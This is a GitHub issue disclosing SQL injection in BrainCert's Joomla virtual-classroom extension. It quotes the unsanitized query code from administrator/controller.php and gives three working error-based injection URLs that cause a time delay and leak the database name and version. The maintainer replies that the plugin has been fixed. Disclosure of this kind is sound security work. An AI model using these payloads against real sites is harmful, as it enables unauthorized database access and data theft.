search

braincert / Online-Virtual-Classroom

Easily integrate BrainCert Virtual classroom in your website, CMS, LMS, or app.
https://www.braincert.com
4 stars 4 forks source link

SQL Injection in Joomla Plugin for Virtual Classroom #2

Open k4k4r07 opened 1 year ago

k4k4r07 commented 1 year ago

Description

SQL Injection is an attack technique used to exploit applications that construct SQL statements from user-supplied input. When successful, the attacker is able to change the logic of SQL statements executed against the database.

Structured Query Language (SQL) is a specialized programming language for sending queries to databases. The SQL programming language is both an ANSI and an ISO standard, though many database products supporting SQL do so with proprietary extensions to the standard language. Applications often use user-supplied data to create SQL statements. If an application fails to properly construct SQL statements it is possible for an attacker to alter the statement structure and execute unplanned and potentially hostile commands. When such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system.

The extension for Joomla at https://extensions.joomla.org/extension/online-virtual-classroom/ contain SQLInjection vulnerability

Root Cause Analysis

The file administrator/controller.php contains the following code at 74

$query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";

As seen clearly the variable value is injected without any sanitization into the SQL Query and then executed therefore causing the SQL Injection

Similarly there are other instances in the same file vulnerable to SQL Injection

95┆ $query="select id from #__virtualclassroom_teacher where user_id='".$value."' "; 321┆ $row = 'SELECT class_id FROM #__virtualclassroom_acl WHERE group_id="'.$gid.'"';

CVSS Score: 8.8 (High)

Steps To Reproduce

  1. Install Joomla 3
  2. Login with any user on the admin panel
  3. Install the extension
  4. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),sleep(10)),7062)--%20mIHZ and the server with execute the sleep query for 10 seconds confirming SQL Injection

MicrosoftTeams-image (1)

  1. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),database()),7062)--%20mIHZ and the server with execute the database query and will disclose the database name in response

MicrosoftTeams-image

  1. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),version()),7062)--%20mIHZ and the server with execute the version query and will disclose the version name in response

MicrosoftTeams-image (2)

Similarly attacker can dump the entire database using this vulnerability.

Video POC

https://github.com/braincert/Online-Virtual-Classroom/assets/51406427/51334160-d4b0-4c7d-9b81-90b0dcf4212c

The vulnerability was discovered in colloboration with @SivaPothuluru-Sajja

braincert commented 1 year ago

Thanks for reporting. Joomla plugin has been updated and posted here https://extensions.joomla.org/extension/online-virtual-classroom/